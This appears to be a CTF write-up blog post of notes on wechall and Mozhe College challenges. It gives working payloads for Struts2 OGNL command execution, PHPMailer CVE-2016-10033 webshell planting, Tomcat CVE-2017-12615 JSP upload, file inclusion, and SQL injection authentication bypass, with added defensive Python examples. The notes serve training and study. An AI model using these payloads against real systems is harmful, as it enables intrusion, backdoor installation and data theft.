CTF notes (wechall & Mozhe College) 19.9.14 - 19.9.30

Notes on the Mozhe College (墨者学院) and wechall challenges.

S2-007
Fill in the information: the age field produces an error prompt.
Fill in '+(#application)+'; if it is echoed back evaluated, the vulnerability exists.
payload: '+(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false"),#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream()))+'
Here the '+ ... +' closes the quotes at both ends and ls / is executed; it is recommended to view the response in burpsuite.

S2-001
Fill in the information: the submitted values are echoed back into the form.
Fill in %{1+1} in the password field; if 2 is echoed, the vulnerability exists.
payload:
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
Commands entered this way must have their spaces replaced by ',' separators; whoami alone is just new java.lang.String[]{"whoami"}.

CVE-2016-10033 PHPMailer
PHPMailer calls the system sendmail when sending mail; because the sender address is not filtered sufficiently, a user can inject sendmail arguments (code injection).
Exp:
Construct the mailbox "attacker\" -OQ/tmp -X/var/www/html/hack.php some"@example.com
and put <?php @eval($_POST[shadow]);?> in the message body.
Sending appears to hang; access /hack.php directly and you will find it has been uploaded successfully, then connect with Chopper.
The one-line trojan can also be rewritten as <?php if(isset($_REQUEST['cmd'])){$cmd=($_REQUEST["cmd"]);system($cmd);echo "$cmd";die;}?>
so that you can access /hack.php/?cmd= to execute commands remotely and get the key.

Manual SQL injection after character filtering
Replace = with like, and URL-encode like as well; replace spaces with /**/; URL-encode the remaining keywords (digits do not need it).

PHP local file inclusion
Viewing the source, a comment reveals that r.php includes a file named by the variable p, and that the key is in the_key_is_here.txt.
payload: /r.php?p=../../../../the_key_is_here, using ../ to traverse directories and read the file.

SQLite manual injection
Still use ', and 1=1, and 1=2 to confirm it is a numeric injection; order by N determines the number of columns.
union select 1,2,...,N to see which columns are echoed normally.
union select 1,name,sql,4 from sqlite_master to dump table and column names (name is the table name, sql holds the column definitions).
union select 1,name,password,4 from table limit N,1 (N>=0) to dump the field values.

Tomcat remote code execution CVE-2017-12615
Vulnerability condition: readonly of org.apache.catalina.servlets.DefaultServlet is set to false.
Refresh the page, capture with Burp, change GET to POST, construct the address /xxx.jsp/ (or xxx.jsp%20, xxx.jsp::$DATA),
and send a JSP webshell as the body.
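Added example (my own, not from the notes or from Tomcat): a check for the vulnerable condition above, parsing a constructed web.xml excerpt for DefaultServlet's readonly init-param and rewriting it to true; the sample XML and function names are assumptions, the param name and the class name are Tomcat's own.

```python
import xml.etree.ElementTree as ET

# Constructed web.xml excerpt (not copied from any server) with the weak setting:
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

def local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]

def _readonly_param(root):
    """Return (DefaultServlet declared?, its readonly <param-value> element or None)."""
    for servlet in root.iter():
        if local(servlet.tag) != "servlet":
            continue
        cls = next((c for c in servlet if local(c.tag) == "servlet-class"), None)
        if cls is None or (cls.text or "").strip() != "org.apache.catalina.servlets.DefaultServlet":
            continue
        for param in servlet:
            if local(param.tag) != "init-param":
                continue
            fields = {local(c.tag): c for c in param}
            name = fields.get("param-name")
            if name is not None and (name.text or "").strip() == "readonly":
                return True, fields.get("param-value")
        return True, None   # declared, but readonly not set: Tomcat's default is true
    return False, None

def default_servlet_readonly(web_xml_text):
    """True if PUT/DELETE are refused, False if readonly=false, None if DefaultServlet is absent."""
    declared, value = _readonly_param(ET.fromstring(web_xml_text))
    if not declared:
        return None
    return value is None or (value.text or "").strip().lower() != "false"

def set_readonly_true(web_xml_text):
    """Return the same web.xml with DefaultServlet's readonly forced to true."""
    root = ET.fromstring(web_xml_text)
    _, value = _readonly_param(root)
    if value is not None:
        value.text = "true"
    if root.tag.startswith("{"):  # keep the default namespace unprefixed when serialising
        ET.register_namespace("", root.tag[1:].split("}")[0])
    return ET.tostring(root, encoding="unicode")
```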

PHP globals (wechall)
Code audit found: if(isset($login)) if(strtolower($login[0])==='admin') xxx
payload: globals.php?login[0]=ADMIN

Limited Access (wechall)
The challenge says the page is protected by a .htaccess file.
Opening .htaccess shows:
AuthUserFile .htpasswd
<Limit GET>
payload: capture with burpsuite and change GET to POST (the <Limit GET> block only restricts GET requests); the content protected by .htpasswd is returned.

Training: PHP LFI
The verification code is: $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
payload: file=../../solution.php%00

Training: Crypto - Caesar II
The challenge data is given in hexadecimal; first convert it from hex to decimal,
then write a program that shifts the numeric array by an offset between 1 and 128 (as the challenge hints), and finally output it as a string.
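Added example (mine, not the notes' solution): the three steps above carried through in Python, with the offset brute-forced over 1..128 and the candidate scored by how much of it looks like text. The ciphertext is constructed here from a known plaintext; it is not the challenge's data.

```python
# Constructed sample, not challenge data: a known plaintext shifted by a known
# offset and rendered as hex, the way the challenge presents its ciphertext.
PLAINTEXT = "The key for this Caesar II round is wechall."

def make_sample(plaintext, offset):
    """Build challenge-style data: add the offset to every byte (mod 256), emit hex."""
    return bytes((b + offset) % 256 for b in plaintext.encode("ascii")).hex()

SAMPLE_HEX = make_sample(PLAINTEXT, 77)

def hex_to_ints(hex_data):
    """Step 1 of the notes: hex string -> list of decimal byte values."""
    clean = "".join(hex_data.split())
    return [int(clean[i:i + 2], 16) for i in range(0, len(clean), 2)]

def shift_ints(values, offset):
    """Step 2: subtract the offset from every value, wrapping within one byte."""
    return [(v - offset) % 256 for v in values]

def text_score(values):
    """Fraction of bytes that are ASCII letters, digits or spaces; English text scores near 1.
    Counting only these (not every printable byte) separates the true offset from
    neighbouring offsets that also land every byte somewhere in the printable range."""
    good = set(range(48, 58)) | set(range(65, 91)) | set(range(97, 123)) | {32}
    return sum(v in good for v in values) / max(len(values), 1)

def crack_caesar_hex(hex_data, offsets=range(1, 129)):
    """Step 3: try every offset the hint allows (1..128) and return (offset, text)
    for the candidate whose output looks most like text."""
    values = hex_to_ints(hex_data)
    best = max(offsets, key=lambda k: text_score(shift_ints(values, k)))
    return best, bytes(shift_ints(values, best)).decode("ascii", errors="replace")

if __name__ == "__main__":
    print(crack_caesar_hex(SAMPLE_HEX))  # -> (77, 'The key for this Caesar II round is wechall.')
```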

Training: MySQL II
Password and username are verified separately; the username is not filtered, so a union select query can be constructed to bypass the check.
payload:
Username: ' union select 1,'admin',md5('password'); #
Password: password
Universal-password extension:
' union select 1,1,1 from admin where ''='

No Escape
Core code: "UPDATE noescvotes SET `$who` = `$who` + 1 WHERE id = 1"; note that it uses backticks, not single quotes.
payload: bill`=111 --%20
which is equivalent to: UPDATE noescvotes SET `bill` = 111 --%20` = `$who` + 1 WHERE id = 1 (everything after -- is a comment)
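Added example (mine, not code from the notes or from wechall): the No Escape pattern reproduced with sqlite3, which also accepts MySQL-style backtick identifiers, beside the fix. Because an identifier cannot be bound as a query parameter, the defence is an allow-list of known column names; the same idea covers the table and column names spliced into the queries of the MySQL II and SQLite sections. The table layout and candidate names are assumptions.

```python
import sqlite3

# Vote columns the application actually knows about; the allow-list is the fix.
ALLOWED_COLUMNS = {"bill", "ted"}

# The notes' payload: the backtick closes the identifier and -- comments out the rest.
PAYLOAD = "bill`=111 -- "

def setup():
    """Fresh in-memory table with the shape the notes' UPDATE statement implies."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE noescvotes (id INTEGER PRIMARY KEY, bill INTEGER, ted INTEGER)")
    con.execute("INSERT INTO noescvotes VALUES (1, 0, 0)")
    return con

def vote_vulnerable(con, who):
    """Mirrors the notes' core code: the column name is spliced into the SQL as an
    identifier, so backtick quoting offers no protection once the input contains `."""
    con.execute(f"UPDATE noescvotes SET `{who}` = `{who}` + 1 WHERE id = 1")

def is_valid_candidate(who):
    """Identifiers cannot be bound as parameters, so validate against an allow-list."""
    return who in ALLOWED_COLUMNS

def vote_hardened(con, who):
    """Same update, but the identifier is checked before it ever reaches the query text."""
    if not is_valid_candidate(who):
        raise ValueError(f"unknown candidate: {who!r}")
    con.execute(f"UPDATE noescvotes SET {who} = {who} + 1 WHERE id = 1")

def votes_for(con, who):
    if not is_valid_candidate(who):
        raise ValueError(who)
    return con.execute(f"SELECT {who} FROM noescvotes WHERE id = 1").fetchone()[0]

def run_demo():
    """Returns (bill's votes after the payload hits the vulnerable code,
    whether the hardened code accepted the payload, bill's votes after one honest vote)."""
    weak = setup()
    vote_vulnerable(weak, PAYLOAD)
    strong = setup()
    try:
        vote_hardened(strong, PAYLOAD)
        accepted = True
    except ValueError:
        accepted = False
    vote_hardened(strong, "bill")
    return votes_for(weak, "bill"), accepted, votes_for(strong, "bill")

if __name__ == "__main__":
    print(run_demo())  # -> (111, False, 1)
```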

Training: Encodings I
The challenge gives a long string of 0s and 1s, hints that it translates into English, and provides tools.
payload: guess it is binary; grouping by the default 8 bits leaves one 0 left over, so try 7-bit groups, which divide evenly; then convert the binary to ASCII.

Summary of universal passwords for injection
String type:
'or'1'='1 / 'or'1'='1
'or''=' / 'or''='
' union select 1,1,1 from admin where ''=' / 1 (assuming the table is admin with columns id, username, password)
Numeric type:
' or 1=1 # (# can be replaced with -- or /*)
admin'#
'=' / '='

Log Analysis
Open the log file in notepad, use the regex (.*)\.(php|jsp|asp) to match uploaded files, find the uploaded webshell and the corresponding attacker IP.
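Added example (mine, not from the notes): the same search done programmatically over constructed Apache combined-format log lines, anchoring the notes' regex to the file extension so photo.jpg does not match while /hack.php/?cmd= style path-info requests still do, and counting hits per source IP. The upload directory names and the log lines are assumptions.

```python
import re
from collections import Counter

# Constructed access-log lines (Apache combined format); the IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2019:10:01:02 +0800] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2019:10:01:30 +0800] "POST /upload.php HTTP/1.1" 200 231 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2019:10:01:45 +0800] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.23 - - [14/Sep/2019:10:02:10 +0800] "GET /uploads/photo.jpg HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
198.51.100.23 - - [14/Sep/2019:10:02:40 +0800] "GET /admin/login.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2019:10:03:00 +0800] "GET /uploads/hack.php/?cmd=whoami HTTP/1.1" 200 1402 "-" "curl/7.64"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# The notes' (.*)\.(php|jsp|asp), anchored so photo.jpg or a /php/ directory does not match,
# but /hack.php/?cmd= style path-info tricks still do.
SCRIPT_RE = re.compile(r'\.(php|jsp|asp)(?=$|[?/])', re.IGNORECASE)
UPLOAD_DIRS = ("/uploads/", "/upload/", "/files/")  # assumption: where user uploads are stored

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def find_uploaded_scripts(log_text):
    """Requests for server-side scripts inside an upload directory: (ip, path, status)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if path.startswith(UPLOAD_DIRS) and SCRIPT_RE.search(path):
            hits.append((rec["ip"], path, int(rec["status"])))
    return hits

def suspect_ips(hits):
    """Count hits per source IP; the top entry is the 'corresponding attacker IP' of the notes."""
    return Counter(ip for ip, _, _ in hits)

if __name__ == "__main__":
    found = find_uploaded_scripts(SAMPLE_LOG)
    for ip, path, status in found:
        print(ip, path, status)
    print(suspect_ips(found).most_common(1))
```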

Source: www.cnblogs.com/5h4d0w/p/11612146.html